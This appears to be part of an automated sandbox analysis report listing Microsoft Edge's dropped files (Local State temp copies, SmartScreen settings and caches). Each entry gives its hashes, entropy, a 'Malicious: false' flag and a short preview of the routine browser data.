Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF35ad3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090751155399332
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6Ctbz8hu3VlXr4CRo1
MD5:	A1977BAA568D2180A3BD8A41892C5415
SHA1:	6102BB8DFD443569978B6DFE39A38CC440F136DC
SHA-256:	A2542EDC69EB6A86827734223BE25A3FF07B2C19923382B40F939D205FB72713
SHA-512:	90E7EE6ADEDF5325E0479008C960D3320C945CDD2E818A6CFF56BC88BA993F1E82F1E378AE4522322959562FDAFA41892AA22E28DE2103F8CFEDD17C617D5A6C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF381b4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090751155399332
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6Ctbz8hu3VlXr4CRo1
MD5:	A1977BAA568D2180A3BD8A41892C5415
SHA1:	6102BB8DFD443569978B6DFE39A38CC440F136DC
SHA-256:	A2542EDC69EB6A86827734223BE25A3FF07B2C19923382B40F939D205FB72713
SHA-512:	90E7EE6ADEDF5325E0479008C960D3320C945CDD2E818A6CFF56BC88BA993F1E82F1E378AE4522322959562FDAFA41892AA22E28DE2103F8CFEDD17C617D5A6C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3aaa8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090751155399332
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6Ctbz8hu3VlXr4CRo1
MD5:	A1977BAA568D2180A3BD8A41892C5415
SHA1:	6102BB8DFD443569978B6DFE39A38CC440F136DC
SHA-256:	A2542EDC69EB6A86827734223BE25A3FF07B2C19923382B40F939D205FB72713
SHA-512:	90E7EE6ADEDF5325E0479008C960D3320C945CDD2E818A6CFF56BC88BA993F1E82F1E378AE4522322959562FDAFA41892AA22E28DE2103F8CFEDD17C617D5A6C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF46c24.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090751155399332
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6Ctbz8hu3VlXr4CRo1
MD5:	A1977BAA568D2180A3BD8A41892C5415
SHA1:	6102BB8DFD443569978B6DFE39A38CC440F136DC
SHA-256:	A2542EDC69EB6A86827734223BE25A3FF07B2C19923382B40F939D205FB72713
SHA-512:	90E7EE6ADEDF5325E0479008C960D3320C945CDD2E818A6CFF56BC88BA993F1E82F1E378AE4522322959562FDAFA41892AA22E28DE2103F8CFEDD17C617D5A6C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4ca13.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090751155399332
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+ftbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEF6Ctbz8hu3VlXr4CRo1
MD5:	A1977BAA568D2180A3BD8A41892C5415
SHA1:	6102BB8DFD443569978B6DFE39A38CC440F136DC
SHA-256:	A2542EDC69EB6A86827734223BE25A3FF07B2C19923382B40F939D205FB72713
SHA-512:	90E7EE6ADEDF5325E0479008C960D3320C945CDD2E818A6CFF56BC88BA993F1E82F1E378AE4522322959562FDAFA41892AA22E28DE2103F8CFEDD17C617D5A6C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.008608518178518
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclU5dUg0YV:YWLSGTt1o9LuLgfGBPAzkVj/T8lU5z0y
MD5:	D5B1BD3B042DC06DD5E80A4BFDE77F48
SHA1:	B8F024F13D9873F24D2D6AB0A691E25E56DDDDE4
SHA-256:	3362F9A4E3D60D1796B5F5F5A309F87CF644FF79F8B58E92025326905F90B93F
SHA-512:	3EC493781F4872C7B1B550433B804E889ECBE95FB21DA778FF11861F5F79E34BBE52DAE42D8FE888299D41BE53D6BE5A5B5771FC84D2FF75FF552049E1021DED
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1731467181430218}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
